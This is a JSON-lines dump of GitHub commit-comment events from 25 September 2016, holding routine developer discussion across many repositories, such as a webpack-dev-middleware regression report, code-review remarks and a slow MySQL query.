{"id":"4614264243","type":"CommitCommentEvent","actor":{"login":"venkaaa"},"repo":{"name":"venkaaa/jetloc"},"payload":{"comment":{"id":19163648,"position":null,"line":null,"path":null,"commit_id":"049111b32e83d6c5235281cd00f6c17ca023ef2b","created_at":"2016-09-25T13:44:25Z","updated_at":"2016-09-25T13:44:25Z","body":"commit on live"}},"created_at":"2016-09-25T13:44:25Z"}
{"id":"4614264969","type":"CommitCommentEvent","actor":{"login":"SpaceK33z"},"repo":{"name":"webpack/webpack-dev-middleware"},"payload":{"comment":{"id":19163651,"position":null,"line":null,"path":null,"commit_id":"e8962937b537d8b080c5939b6c04fbeb9d5277fe","created_at":"2016-09-25T13:44:53Z","updated_at":"2016-09-25T13:44:53Z","body":"If this previously worked, it's an issue in webpack-dev-middleware. The intent of this check is to prevent a very weird error message from appearing, and instead giving a clear error message."}},"created_at":"2016-09-25T13:44:53Z"}
{"id":"4614266619","type":"CommitCommentEvent","actor":{"login":"MSGhero"},"repo":{"name":"openfl/openfl"},"payload":{"comment":{"id":19163653,"position":null,"line":null,"path":null,"commit_id":"3f2f356ef598aae1bb860250e60303e6962c8dcd","created_at":"2016-09-25T13:46:00Z","updated_at":"2016-09-25T13:46:00Z","body":"Aww man now I'll have merge conflicts in my PR 😥"}},"created_at":"2016-09-25T13:46:00Z"}
{"id":"4614268239","type":"CommitCommentEvent","actor":{"login":"battlmonstr"},"repo":{"name":"battlmonstr/awesome-xcode-extensions"},"payload":{"comment":{"id":19163654,"position":null,"line":null,"path":null,"commit_id":"0e9343905e027cc868a62b2e218d00af83c6e400","created_at":"2016-09-25T13:47:05Z","updated_at":"2016-09-25T13:47:05Z","body":"It was included in the xcsort2 branch that you have already merged."}},"created_at":"2016-09-25T13:47:05Z"}
{"id":"4614268640","type":"CommitCommentEvent","actor":{"login":"JanWerder"},"repo":{"name":"love2d-community/awesome-love2d"},"payload":{"comment":{"id":19163655,"position":null,"line":null,"path":null,"commit_id":"1eba494c34f69a6f0896a01e9f9079a7216d9b83","created_at":"2016-09-25T13:47:23Z","updated_at":"2016-09-25T13:47:23Z","body":"Thanks!"}},"created_at":"2016-09-25T13:47:23Z"}
{"id":"4614269332","type":"CommitCommentEvent","actor":{"login":"mcccs"},"repo":{"name":"ThisTestUser/Docs"},"payload":{"comment":{"id":19163657,"position":null,"line":null,"path":null,"commit_id":"ee739e1721641f4655aafd3d0cddd9b7defd69f0","created_at":"2016-09-25T13:47:50Z","updated_at":"2016-09-25T13:47:50Z","body":"Yes, it opens a new tab. I thought you meant new window when you said \"pop-up\"."}},"created_at":"2016-09-25T13:47:50Z"}
{"id":"4614269460","type":"CommitCommentEvent","actor":{"login":"Kwpolska"},"repo":{"name":"getnikola/nikola"},"payload":{"comment":{"id":19163658,"position":8,"line":182,"path":"nikola/post.py","commit_id":"de83db3d920aeca4fab03ab07c7653f6e962e794","created_at":"2016-09-25T13:47:55Z","updated_at":"2016-09-25T13:47:55Z","body":"Fixed in a021717."}},"created_at":"2016-09-25T13:47:55Z"}
{"id":"4614270919","type":"CommitCommentEvent","actor":{"login":"bjansen"},"repo":{"name":"ceylon/ceylon-ide-common"},"payload":{"comment":{"id":19163662,"position":46,"line":35,"path":"source/com/redhat/ceylon/ide/common/model/asjava/CeylonToJavaMapper.ceylon","commit_id":"21c17ce48016d376c34db62b1765308cd55c0797","created_at":"2016-09-25T13:48:47Z","updated_at":"2016-09-25T13:48:47Z","body":"Hum no I think it's correct. Both objects and other values will result in `foo_.get_()`, from the point of view of Java code. `JObjectMirror` might not be the best name though. It was originally there for objects, but since other values follow the same scheme, I reused the same class without renaming it."}},"created_at":"2016-09-25T13:48:47Z"}
{"id":"4614274244","type":"CommitCommentEvent","actor":{"login":"toxicFork"},"repo":{"name":"webpack/webpack-dev-middleware"},"payload":{"comment":{"id":19163664,"position":null,"line":null,"path":null,"commit_id":"e8962937b537d8b080c5939b6c04fbeb9d5277fe","created_at":"2016-09-25T13:50:56Z","updated_at":"2016-09-25T13:50:56Z","body":"Yes manually undoing this commit in my `node_modules/webpack-dev-middleware/middleware.js` fixes it.\r\n\r\nIt was working previously but when I reinstalled my npm packages for my project it started happening.\r\n\r\nI think it's because `karma-webpack` depends on `webpack-dev-middleware` with a `^` semver prefix ( `^1.0.11` from https://github.com/webpack/karma-webpack/blob/master/package.json#L38 ) so when I used `npm install` it got the most recent version `1.8.2` which brings this change.\r\n\r\n`webpack-dev-middleware` could remove the `^` semver prefix and use strict semver version too to prevent this kind of regressions..."}},"created_at":"2016-09-25T13:50:56Z"}
{"id":"4614275031","type":"CommitCommentEvent","actor":{"login":"mikiones"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19163666,"position":null,"line":null,"path":null,"commit_id":"e02ab515c4ab0ff9becad9c890282e9e6ad202a0","created_at":"2016-09-25T13:51:27Z","updated_at":"2016-09-25T13:51:27Z","body":"going give it a try"}},"created_at":"2016-09-25T13:51:27Z"}
{"id":"4614275322","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon-ide-common"},"payload":{"comment":{"id":19163667,"position":46,"line":35,"path":"source/com/redhat/ceylon/ide/common/model/asjava/CeylonToJavaMapper.ceylon","commit_id":"21c17ce48016d376c34db62b1765308cd55c0797","created_at":"2016-09-25T13:51:38Z","updated_at":"2016-09-25T13:51:38Z","body":"Ah, alright, that makes sense: just bad naming then."}},"created_at":"2016-09-25T13:51:38Z"}
{"id":"4614276153","type":"CommitCommentEvent","actor":{"login":"Cruseobws"},"repo":{"name":"Cruseobws/tron-bike"},"payload":{"comment":{"id":19163669,"position":null,"line":null,"path":null,"commit_id":"e5a672dc567abdfbcd6b12895191c39ec87a7d39","created_at":"2016-09-25T13:52:13Z","updated_at":"2016-09-25T13:52:13Z","body":"Farout!"}},"created_at":"2016-09-25T13:52:13Z"}
{"id":"4614276474","type":"CommitCommentEvent","actor":{"login":"SpaceK33z"},"repo":{"name":"webpack/webpack-dev-middleware"},"payload":{"comment":{"id":19163671,"position":null,"line":null,"path":null,"commit_id":"e8962937b537d8b080c5939b6c04fbeb9d5277fe","created_at":"2016-09-25T13:52:27Z","updated_at":"2016-09-25T13:52:27Z","body":"True, but these kind of issues should not happen unless for major versions. I'm working on a fix."}},"created_at":"2016-09-25T13:52:27Z"}
{"id":"4614276739","type":"CommitCommentEvent","actor":{"login":"pexcn"},"repo":{"name":"pexcn/SimpleUtils"},"payload":{"comment":{"id":19163673,"position":null,"line":null,"path":null,"commit_id":"0cf0083bf25e5284dfc4b66f6f8e1ed74e2553a9","created_at":"2016-09-25T13:52:39Z","updated_at":"2016-09-25T13:52:39Z","body":"@aa65535 大神你好，有一个 Android 的问题需要请教一下\r\n请问会不会因为 `sContextRef` 这个静态变量导致 Activity 内存泄漏？"}},"created_at":"2016-09-25T13:52:39Z"}
{"id":"4614276818","type":"CommitCommentEvent","actor":{"login":"toxicFork"},"repo":{"name":"webpack/webpack-dev-middleware"},"payload":{"comment":{"id":19163674,"position":null,"line":null,"path":null,"commit_id":"e8962937b537d8b080c5939b6c04fbeb9d5277fe","created_at":"2016-09-25T13:52:42Z","updated_at":"2016-09-25T13:52:42Z","body":"Thanks and ❤️ for the super-swift reply!"}},"created_at":"2016-09-25T13:52:42Z"}
{"id":"4614278779","type":"CommitCommentEvent","actor":{"login":"ruslo"},"repo":{"name":"qedsoftware/crashup"},"payload":{"comment":{"id":19163676,"position":24,"line":45,"path":"USAGE.md","commit_id":"6ebb2d8a270d67ecfb38fbf0913dd353371325da","created_at":"2016-09-25T13:54:07Z","updated_at":"2016-09-25T13:54:07Z","body":"@wojtex This one was fixed, no?"}},"created_at":"2016-09-25T13:54:07Z"}
{"id":"4614279074","type":"CommitCommentEvent","actor":{"login":"rm-code"},"repo":{"name":"love2d-community/awesome-love2d"},"payload":{"comment":{"id":19163677,"position":null,"line":null,"path":null,"commit_id":"1eba494c34f69a6f0896a01e9f9079a7216d9b83","created_at":"2016-09-25T13:54:18Z","updated_at":"2016-09-25T13:54:18Z","body":"You are welcome :)"}},"created_at":"2016-09-25T13:54:18Z"}
{"id":"4614281158","type":"CommitCommentEvent","actor":{"login":"d8ahazard"},"repo":{"name":"topjohnwu/MagiskManager"},"payload":{"comment":{"id":19163680,"position":87,"line":67,"path":"app/src/main/java/com/topjohnwu/magisk/SplashActivity.java","commit_id":"89932b325d6a1b66c8bda5f64044116ac0d7dab3","created_at":"2016-09-25T13:55:43Z","updated_at":"2016-09-25T13:55:43Z","body":"Doesn't this initialize a variable in MainActivity we need?"}},"created_at":"2016-09-25T13:55:43Z"}
{"id":"4614281205","type":"CommitCommentEvent","actor":{"login":"anishrijal"},"repo":{"name":"anishrijal/ToDO"},"payload":{"comment":{"id":19163681,"position":null,"line":null,"path":null,"commit_id":"3278208b220183a8237822ceacb64f09b58e6da4","created_at":"2016-09-25T13:55:44Z","updated_at":"2016-09-25T13:55:44Z","body":"adding all js"}},"created_at":"2016-09-25T13:55:44Z"}
{"id":"4614284797","type":"CommitCommentEvent","actor":{"login":"drallieiv"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19163686,"position":null,"line":null,"path":null,"commit_id":"70de5c3202bc806a98ca913a5a0419912d40644d","created_at":"2016-09-25T13:58:05Z","updated_at":"2016-09-25T13:58:05Z","body":"What are the default values for that cleaning ?\r\n\r\nMy pokemon table is currently 3M+ entries, making some queries very slow :\r\n\r\nSELECT `t1`.`latitude`, `t1`.`longitude`, `t1`.`spawnpoint_id`, ((EXTRACT(minute FROM `t1`.`disappear_time`) * 60) + EXTRACT(second FROM `t1`.`disappear_time`)) AS time, Count(`t1`.`spawnpoint_id`) AS count FROM `pokemon` AS t1 WHERE ((((`t1`.`latitude` <= *) AND (`t1`.`latitude` >= *)) AND (`t1`.`longitude` >= *)) AND (`t1`.`longitude` <= *)) GROUP BY `t1`.`latitude`, `t1`.`longitude`, `t1`.`spawnpoint_id`, time;\r\n\r\nAlso I am running mysql server and thought about switching to mariaDB"}},"created_at":"2016-09-25T13:58:05Z"}
{"id":"4614290109","type":"CommitCommentEvent","actor":{"login":"liguge"},"repo":{"name":"AnyListen/AnyListen"},"payload":{"comment":{"id":19163690,"position":null,"line":null,"path":null,"commit_id":"61ddc10e78f9b4ce43dda99d1951f847c1d2e4e4","created_at":"2016-09-25T14:01:12Z","updated_at":"2016-09-25T14:01:12Z","body":"似乎单曲解析不可以了 只有搜索这张专辑的时候才可以正确下载的~"}},"created_at":"2016-09-25T14:01:12Z"}
{"id":"4614292259","type":"CommitCommentEvent","actor":{"login":"AndrioCelos"},"repo":{"name":"Iyouboushi/mIRC-BattleArena"},"payload":{"comment":{"id":19163691,"position":null,"line":null,"path":null,"commit_id":"fc32ddd44cf2005be2571082050f8e8ee2e2ef04","created_at":"2016-09-25T14:02:35Z","updated_at":"2016-09-25T14:02:35Z","body":"Speaking of dragon hunt bugs, it's been noted that shadow dragons are weak to their own element.\r\nIs _that_ a bug?"}},"created_at":"2016-09-25T14:02:35Z"}
{"id":"4614292292","type":"CommitCommentEvent","actor":{"login":"mk5005"},"repo":{"name":"mk5005/MBS_Hackathon"},"payload":{"comment":{"id":19163692,"position":null,"line":null,"path":null,"commit_id":"d8e66fa114918e4922396842b78bf4f6956072a2","created_at":"2016-09-25T14:02:37Z","updated_at":"2016-09-25T14:02:37Z","body":"MERGE"}},"created_at":"2016-09-25T14:02:37Z"}
{"id":"4614296296","type":"CommitCommentEvent","actor":{"login":"fgsch"},"repo":{"name":"varnishcache/varnish-cache"},"payload":{"comment":{"id":19163697,"position":6,"line":27,"path":"bin/varnishtest/tests/v00020.vtc","commit_id":"c7e56c424679e0ca63ab90c061defc85822bc56c","created_at":"2016-09-25T14:05:11Z","updated_at":"2016-09-25T14:05:11Z","body":"These tests are for compiler coverage. We should have separate tests for this."}},"created_at":"2016-09-25T14:05:11Z"}
{"id":"4614296892","type":"CommitCommentEvent","actor":{"login":"jas-per"},"repo":{"name":"bvaughn/react-virtualized"},"payload":{"comment":{"id":19163698,"position":null,"line":null,"path":null,"commit_id":"674cb66c7e9dfece84ffe7aa82a1cf9bbed68b35","created_at":"2016-09-25T14:05:35Z","updated_at":"2016-09-25T14:05:35Z","body":"not quite sure, but since the onScroll callback is normally attached to the Grid via onScroll-Property, doesn't this change cause onScroll to be triggered twice now? once via onScroll-Property and then another time because of the new scroll !== prevState.scroll check? .. (unless you use a WindowScroller-like external scrolling container of course)"}},"created_at":"2016-09-25T14:05:35Z"}
{"id":"4614299192","type":"CommitCommentEvent","actor":{"login":"alwey"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19163702,"position":null,"line":null,"path":null,"commit_id":"155caf938a0cd58600d95ac34ab4652da97bca0e","created_at":"2016-09-25T14:06:57Z","updated_at":"2016-09-25T14:06:57Z","body":"The statistical weights of specific endgames must be taken into account. If I made a patch for an endgame which would lose strength but the endgame type were of low importance then my patch could eventually pass a non-regression test.\r\n\r\nOn the other hand improvements in a rare endgame type will hardly pass a normal SPRT [0..5] or [0..4].\r\n"}},"created_at":"2016-09-25T14:06:57Z"}
{"id":"4614307949","type":"CommitCommentEvent","actor":{"login":"KravitzLab"},"repo":{"name":"jfeye/fed"},"payload":{"comment":{"id":19163710,"position":null,"line":null,"path":null,"commit_id":"c578856f9d5d29754c56a33216584b8b26bc28aa","created_at":"2016-09-25T14:12:48Z","updated_at":"2016-09-25T14:12:48Z","body":"Sounds like a great idea (and it should work with minor edits). \r\n\r\nBTW check out our main page (https://github.com/KravitzLab/FED) if you haven't this weekend - we made a lot of updates in the last couple days, putting up a new protocol document and much improved 3D design files.  Once you get your edits tested let me know if you want us to post a description/link on our main github.  I'm thinking of putting up a \"variants\" directory with links to FED variants if/as people make them.\r\n"}},"created_at":"2016-09-25T14:12:48Z"}
{"id":"4614308763","type":"CommitCommentEvent","actor":{"login":"netux79"},"repo":{"name":"netux79/myra1002"},"payload":{"comment":{"id":19163712,"position":null,"line":null,"path":null,"commit_id":"07d2dd532de6bd7d003fc3c6256344e2d0515e4f","created_at":"2016-09-25T14:13:22Z","updated_at":"2016-09-25T14:13:22Z","body":"Hi @twinaphex.\r\nI will get married early next month and I don't have much spare time right now but if I found some time I will give it a try. No problem."}},"created_at":"2016-09-25T14:13:22Z"}
{"id":"4614311879","type":"CommitCommentEvent","actor":{"login":"jamescummings"},"repo":{"name":"TEIC/Stylesheets"},"payload":{"comment":{"id":19163714,"position":null,"line":null,"path":null,"commit_id":"f3044b9e37520fd034b27dc792f948a8cb172538","created_at":"2016-09-25T14:15:28Z","updated_at":"2016-09-25T14:15:28Z","body":"That looks right to me.  That will make the xml-base file:/// but doesn't that mean, since it starts with '/' that this will be file:////  ? or is that just that the xml-base is file:/// and its interprets the / from there."}},"created_at":"2016-09-25T14:15:28Z"}
{"id":"4614313564","type":"CommitCommentEvent","actor":{"login":"damon-atkins"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19163716,"position":null,"line":null,"path":null,"commit_id":"6985a456239766237a831153b7e7636c7d0dd051","created_at":"2016-09-25T14:16:35Z","updated_at":"2016-09-25T14:16:35Z","body":"```\r\nIf set to a nonzero integer, then passing ``refresh=True`` to functions in the\r\n:mod:`windows pkg module <salt.modules.win_pkg>` will not refresh the windows\r\nrepo metadata if the age of the metadata is less than this value.\r\n```\r\nPlease add \"except for refresh_db which will always result in a refresh regardless of this setting\"\r\n"}},"created_at":"2016-09-25T14:16:35Z"}
{"id":"4614314895","type":"CommitCommentEvent","actor":{"login":"raffazizzi"},"repo":{"name":"TEIC/Stylesheets"},"payload":{"comment":{"id":19163718,"position":null,"line":null,"path":null,"commit_id":"f3044b9e37520fd034b27dc792f948a8cb172538","created_at":"2016-09-25T14:17:31Z","updated_at":"2016-09-25T14:17:31Z","body":"Good question: there may be an extra \"/\" in there. It would of course work anyway, but we should have the right number of \"/\"s. Will test and correct if necessary\r\n "}},"created_at":"2016-09-25T14:17:31Z"}
{"id":"4614316130","type":"CommitCommentEvent","actor":{"login":"SGrondin"},"repo":{"name":"SGrondin/bottleneck"},"payload":{"comment":{"id":19163720,"position":4,"line":82,"path":"src/Bottleneck.coffee","commit_id":"e573e1ac5be2f4e0d05914efd427eeed4b88d856","created_at":"2016-09-25T14:18:24Z","updated_at":"2016-09-25T14:18:24Z","body":"While adding tests, I just realize that this commit is incorrect and the original code was fine. The actual error from the wrapped call is in position 2 (in the `args` arrays) and gets passed correctly. The `error` variable is simply a truthy value to indicate the presence of an error."}},"created_at":"2016-09-25T14:18:24Z"}
{"id":"4614318922","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon-ide-common"},"payload":{"comment":{"id":19163721,"position":null,"line":null,"path":null,"commit_id":"e9917fecc9f6031c160506a047bc1629af8c748c","created_at":"2016-09-25T14:20:18Z","updated_at":"2016-09-25T14:20:18Z","body":"@bjansen does this change look correct to you?"}},"created_at":"2016-09-25T14:20:18Z"}
{"id":"4614319034","type":"CommitCommentEvent","actor":{"login":"celeron533"},"repo":{"name":"shadowsocks/shadowsocks-windows"},"payload":{"comment":{"id":19163722,"position":null,"line":null,"path":null,"commit_id":"c671c7c32dc5604abf2f86145e875fd1f5b5dc35","created_at":"2016-09-25T14:20:23Z","updated_at":"2016-09-25T14:20:23Z","body":"看来以后每个版本都能换一句话了~~~"}},"created_at":"2016-09-25T14:20:23Z"}
{"id":"4614319574","type":"CommitCommentEvent","actor":{"login":"dlstess"},"repo":{"name":"dlstess/test-repo"},"payload":{"comment":{"id":19163724,"position":null,"line":null,"path":null,"commit_id":"140b5381ca3bdfe3a352e7c4cba40d402fb2d000","created_at":"2016-09-25T14:20:46Z","updated_at":"2016-09-25T14:20:46Z","body":"Split"}},"created_at":"2016-09-25T14:20:46Z"}
{"id":"4614323058","type":"CommitCommentEvent","actor":{"login":"jamesbond3142"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19163728,"position":null,"line":null,"path":null,"commit_id":"81d8d031482691f7d0f62d56ef41a29dc85049bd","created_at":"2016-09-25T14:23:06Z","updated_at":"2016-09-25T14:23:06Z","body":"How about a super light weight web browser (38K only) meant **specifically** for this task?\r\nhttp://lightofdawn.org/blog/?viewDetailed=00142\r\n"}},"created_at":"2016-09-25T14:23:06Z"}
{"id":"4614323112","type":"CommitCommentEvent","actor":{"login":"jamesbascle"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19163729,"position":null,"line":null,"path":null,"commit_id":"8bf209ed6d292552228fb48984f0a8b84935a44d","created_at":"2016-09-25T14:23:09Z","updated_at":"2016-09-25T14:23:09Z","body":"What if instead of removing all the AsT{n}, do As<T> where T : T{n}  in the generator?"}},"created_at":"2016-09-25T14:23:09Z"}
{"id":"4614324142","type":"CommitCommentEvent","actor":{"login":"Nandil"},"repo":{"name":"Xelwon/PokemonGo-Bot"},"payload":{"comment":{"id":19163731,"position":null,"line":null,"path":null,"commit_id":"0306c0e52665d9adfd2e4af61ae46fc303446b42","created_at":"2016-09-25T14:23:50Z","updated_at":"2016-09-25T14:23:50Z","body":"Can you pls Upload a full Folder, i don´t no open this and copy.\r\n\r\npls send me a link vor Full bot download ( finish )"}},"created_at":"2016-09-25T14:23:50Z"}
{"id":"4614324288","type":"CommitCommentEvent","actor":{"login":"vhart"},"repo":{"name":"Mgtei/AC3.2Unit2MidunitAssessment"},"payload":{"comment":{"id":19163732,"position":32,"line":32,"path":"AC3.2Unit2MidunitAssessment/AC3.2Unit2MidunitAssessment/ViewController.swift","commit_id":"2dd739434a2193573fb88bc2855f3b1598b310b9","created_at":"2016-09-25T14:23:56Z","updated_at":"2016-09-25T14:23:56Z","body":"You don't need a `for - in` loop. You need to keep track of which `index` you are currently at and then increment the index each time the button is tapped"}},"created_at":"2016-09-25T14:23:56Z"}
{"id":"4614326226","type":"CommitCommentEvent","actor":{"login":"StanBondar"},"repo":{"name":"StanBondar/JavaCoreGOIT"},"payload":{"comment":{"id":19163733,"position":23,"line":23,"path":"src/Modue3/task4/User.java","commit_id":"4e2aa82f4a2bebc6816d3905f4f806418c68d400","created_at":"2016-09-25T14:25:13Z","updated_at":"2016-09-25T14:25:13Z","body":"Согласен. Да и плюс ко всему она названа не по правилам."}},"created_at":"2016-09-25T14:25:13Z"}
{"id":"4614327933","type":"CommitCommentEvent","actor":{"login":"StanBondar"},"repo":{"name":"StanBondar/JavaCoreGOIT"},"payload":{"comment":{"id":19163734,"position":28,"line":28,"path":"src/Modue3/task4/User.java","commit_id":"4e2aa82f4a2bebc6816d3905f4f806418c68d400","created_at":"2016-09-25T14:26:18Z","updated_at":"2016-09-25T14:26:18Z","body":"Я меняю переменную, что бы можно было сделать проверку снимаемой суммы. Или можно в данном случае её пустой оставлять?"}},"created_at":"2016-09-25T14:26:18Z"}
{"id":"4614331132","type":"CommitCommentEvent","actor":{"login":"u2"},"repo":{"name":"u2/u2.github.io"},"payload":{"comment":{"id":19163737,"position":null,"line":null,"path":null,"commit_id":"8b181f8bec66f49f67d9d94e1d52aa2ef0d877d4","created_at":"2016-09-25T14:28:27Z","updated_at":"2016-09-25T14:28:27Z","body":"ze name blackout worried that our cipher is too weak on next message switch to vigenere cipher keyword is the hidden symbol of death in my favorite holbeinend\r\n\r\nstart i grabbed everything i could find please return any blueprints for vault and alarm design based on which bank you decide on i am setting up safe house co"}},"created_at":"2016-09-25T14:28:27Z"}
{"id":"4614332700","type":"CommitCommentEvent","actor":{"login":"perlundq"},"repo":{"name":"perlundq/yajsync"},"payload":{"comment":{"id":19163740,"position":null,"line":null,"path":null,"commit_id":"105d270ccc9f381694dcea690ed903fe82b9590c","created_at":"2016-09-25T14:29:29Z","updated_at":"2016-09-25T14:29:29Z","body":"Well, I just tried building an android project with the yajsync source and it fails on missing the java.nio.file package. It seems like they're going to use openjdk for future versions of android (http://openjdk.java.net/projects/mobile/android.html). So this won't stop yajsync from using the java 8 features.\r\n\r\n"}},"created_at":"2016-09-25T14:29:29Z"}
{"id":"4614334569","type":"CommitCommentEvent","actor":{"login":"SpaceK33z"},"repo":{"name":"webpack/webpack-dev-middleware"},"payload":{"comment":{"id":19163743,"position":null,"line":null,"path":null,"commit_id":"e8962937b537d8b080c5939b6c04fbeb9d5277fe","created_at":"2016-09-25T14:30:40Z","updated_at":"2016-09-25T14:30:40Z","body":"np :). There should be a fix in `master` now, can you try it out?"}},"created_at":"2016-09-25T14:30:40Z"}
{"id":"4614334938","type":"CommitCommentEvent","actor":{"login":"Krudor"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19163745,"position":null,"line":null,"path":null,"commit_id":"d4887311e39527e036419ebd966f399fdbdae67a","created_at":"2016-09-25T14:30:53Z","updated_at":"2016-09-25T14:30:53Z","body":"Woah that was fast, awesome!"}},"created_at":"2016-09-25T14:30:53Z"}
{"id":"4614336644","type":"CommitCommentEvent","actor":{"login":"bsaravanan"},"repo":{"name":"bsaravanan/codestart"},"payload":{"comment":{"id":19163747,"position":null,"line":null,"path":null,"commit_id":"7a9dda7cfb3468bf719a9ab7fe9a3b34c8a28b6a","created_at":"2016-09-25T14:31:55Z","updated_at":"2016-09-25T14:31:55Z","body":"Do Nothing"}},"created_at":"2016-09-25T14:31:55Z"}
{"id":"4614336870","type":"CommitCommentEvent","actor":{"login":"Stomach-ache"},"repo":{"name":"njuLearningTeam/leetcode"},"payload":{"comment":{"id":19163748,"position":null,"line":null,"path":null,"commit_id":"94b716664e2fd362aa91d1105c09d0db212e96ad","created_at":"2016-09-25T14:32:05Z","updated_at":"2016-09-25T14:32:05Z","body":"This is the slides for weekly discussion prepared by Tong Wei on Sep. 25, 2016."}},"created_at":"2016-09-25T14:32:05Z"}
{"id":"4614338507","type":"CommitCommentEvent","actor":{"login":"otiai10"},"repo":{"name":"otiai10/kanColleWidget"},"payload":{"comment":{"id":19163752,"position":7,"line":125,"path":"src/js/Components/Models/Queue/Queue.js","commit_id":"993103e6ace16ce6df50ff57a81ef3dd0ff4ea58","created_at":"2016-09-25T14:33:09Z","updated_at":"2016-09-25T14:33:09Z","body":"v1同様、AssetManager(configAccesor, mod = chorme)みたいなのつくるか"}},"created_at":"2016-09-25T14:33:09Z"}
{"id":"4614338692","type":"CommitCommentEvent","actor":{"login":"alexjfisher"},"repo":{"name":"voxpupuli/puppet-php"},"payload":{"comment":{"id":19163753,"position":null,"line":null,"path":null,"commit_id":"5d50ac56414c4ef972a8aa6512032fb4c05891a0","created_at":"2016-09-25T14:33:16Z","updated_at":"2016-09-25T14:33:16Z","body":"@mmoll Hi!  Did you evaluate how much work might be involved in fixing the issues?"}},"created_at":"2016-09-25T14:33:16Z"}
{"id":"4614339318","type":"CommitCommentEvent","actor":{"login":"deathmetalland"},"repo":{"name":"fetus-hina/stat.ink"},"payload":{"comment":{"id":19163755,"position":null,"line":null,"path":null,"commit_id":"0d25a2f1e72aa1adf30f3fb9744ed1129a2b6ce6","created_at":"2016-09-25T14:33:40Z","updated_at":"2016-09-25T14:33:40Z","body":"🎉 "}},"created_at":"2016-09-25T14:33:40Z"}
{"id":"4614339338","type":"CommitCommentEvent","actor":{"login":"jamescummings"},"repo":{"name":"TEIC/Stylesheets"},"payload":{"comment":{"id":19163756,"position":null,"line":null,"path":null,"commit_id":"f3044b9e37520fd034b27dc792f948a8cb172538","created_at":"2016-09-25T14:33:40Z","updated_at":"2016-09-25T14:33:40Z","body":"Well, I'm not sure that it just concatenates it.... it _evaluates_ it with respect to that.  I just wasn't sure so thought I'd ask. ;-)"}},"created_at":"2016-09-25T14:33:40Z"}
{"id":"4614339427","type":"CommitCommentEvent","actor":{"login":"caspervanneck"},"repo":{"name":"XPocket/XPocket"},"payload":{"comment":{"id":19163757,"position":null,"line":null,"path":null,"commit_id":"0b67aafa178c10b42eccf763562f7e372d1bf845","created_at":"2016-09-25T14:33:44Z","updated_at":"2016-09-25T14:33:44Z","body":"this is the PROTOCOL from the new update"}},"created_at":"2016-09-25T14:33:44Z"}
{"id":"4614340410","type":"CommitCommentEvent","actor":{"login":"drizbit"},"repo":{"name":"Airblader/i3"},"payload":{"comment":{"id":19163758,"position":null,"line":null,"path":null,"commit_id":"9b336108b23e9ac6aa758846884b8a15767fcfa3","created_at":"2016-09-25T14:34:23Z","updated_at":"2016-09-25T14:34:23Z","body":"How do you set the transparency levels in the config?"}},"created_at":"2016-09-25T14:34:23Z"}
{"id":"4614342160","type":"CommitCommentEvent","actor":{"login":"dannyvw"},"repo":{"name":"Kunstmaan/KunstmaanBundlesCMS"},"payload":{"comment":{"id":19163759,"position":4,"line":48,"path":"src/Kunstmaan/NodeBundle/Form/NodeMenuTabTranslationAdminType.php","commit_id":"efc3e2980688ecb418a186d9058b50f3537f6c3a","created_at":"2016-09-25T14:35:30Z","updated_at":"2016-09-25T14:35:30Z","body":"@jockri You have reverted the change from #1297"}},"created_at":"2016-09-25T14:35:30Z"}
{"id":"4614342244","type":"CommitCommentEvent","actor":{"login":"yumetodo"},"repo":{"name":"Nagarei/DxLibEx"},"payload":{"comment":{"id":19163760,"position":null,"line":null,"path":null,"commit_id":"4b35178066249ef3d5623920ef48aea9e5cc095f","created_at":"2016-09-25T14:35:33Z","updated_at":"2016-09-25T14:35:33Z","body":"@Nagarei \r\nこれ、``operator!``と``explicit operator bool``もオーバーロードします？"}},"created_at":"2016-09-25T14:35:33Z"}
{"id":"4614344067","type":"CommitCommentEvent","actor":{"login":"sf-x"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19163761,"position":null,"line":null,"path":null,"commit_id":"da4927a1e29ee3a4c0b10ff75cdd0930f55b6e7a","created_at":"2016-09-25T14:36:48Z","updated_at":"2016-09-25T14:36:48Z","body":"May I ask what's the point of testing asymmeric changes against a nearly equal engine? The only thing that ever passed such tests was dynamic contempt. \r\nNeither do Houdini or Komodo become stronger against themselves with contempt on."}},"created_at":"2016-09-25T14:36:48Z"}
{"id":"4614344648","type":"CommitCommentEvent","actor":{"login":"mmoll"},"repo":{"name":"voxpupuli/puppet-php"},"payload":{"comment":{"id":19163762,"position":null,"line":null,"path":null,"commit_id":"5d50ac56414c4ef972a8aa6512032fb4c05891a0","created_at":"2016-09-25T14:37:13Z","updated_at":"2016-09-25T14:37:13Z","body":"@alexjfisher Nope. I also think first test coverage needs to go up for tests to have meaningful results, especially for such version/migration specific topics."}},"created_at":"2016-09-25T14:37:13Z"}
{"id":"4614346419","type":"CommitCommentEvent","actor":{"login":"Mamaduka"},"repo":{"name":"algolia/algoliasearch-wordpress"},"payload":{"comment":{"id":19163764,"position":6,"line":72,"path":"includes/admin/class-algolia-admin.php","commit_id":"27cd3d5669ab8d5ec0162e99a72a025e4e980038","created_at":"2016-09-25T14:38:28Z","updated_at":"2016-09-25T14:38:28Z","body":"You can force scheme for `admin_url()` with its second param.\r\n\r\n```\r\n$scheme = ( defined( 'ALGOLIA_LOOPBACK_HTTP' ) && ALGOLIA_LOOPBACK_HTTP ) ? 'http' : 'admin';\r\n$url = admin_url( 'admin-post.php', $scheme );\r\n```"}},"created_at":"2016-09-25T14:38:28Z"}
{"id":"4614348255","type":"CommitCommentEvent","actor":{"login":"Rpessoa"},"repo":{"name":"Rpessoa/CS"},"payload":{"comment":{"id":19163767,"position":null,"line":null,"path":null,"commit_id":"d77b35dde45ec6a2d2f708d894df01fbe0dfbb9e","created_at":"2016-09-25T14:39:40Z","updated_at":"2016-09-25T14:39:40Z","body":"I added the mul() method and corrected the sum() method"}},"created_at":"2016-09-25T14:39:40Z"}
